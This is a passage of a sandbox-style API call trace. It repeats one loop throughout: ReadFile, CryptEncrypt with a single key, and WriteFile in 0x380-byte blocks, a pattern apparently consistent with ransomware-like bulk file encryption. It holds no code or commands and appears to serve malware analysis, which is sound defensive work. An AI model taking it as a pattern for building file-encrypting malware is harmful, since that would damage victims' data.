hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.798] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.799] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.800] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.801] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 